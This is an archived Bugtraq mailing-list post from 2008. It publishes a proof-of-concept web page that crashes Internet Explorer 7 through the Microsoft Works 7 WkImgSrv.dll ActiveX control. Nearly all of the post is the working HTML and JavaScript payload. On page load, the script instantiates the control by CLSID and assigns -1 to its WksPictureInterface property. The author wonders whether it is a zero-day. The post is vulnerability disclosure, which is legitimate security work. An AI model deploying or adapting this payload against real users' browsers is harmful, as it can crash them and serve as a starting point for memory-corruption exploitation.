NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2008-04

Microsoft Works 7 WkImgSrv.dll crash POC

wsn1983gmail.com
Date: Thu Apr 17 2008 - 03:50:45 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

DLL VERSION 7.03.0616.0
TEST ON IE7+XPSP2_CN
MYBLOG:http://hi.baidu.com/nansec/
0DAY? I don't know.
POC:
<html>
<head>
  <title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
  <script language="JavaScript">
    function payload() { var num = -1;
                                                                                                obj.WksPictureInterface = num;
                                                                                         }
   </script>
</head>
<body onload="JavaScript: return payload();">
        <object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
        </object>
</body>
</html>

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]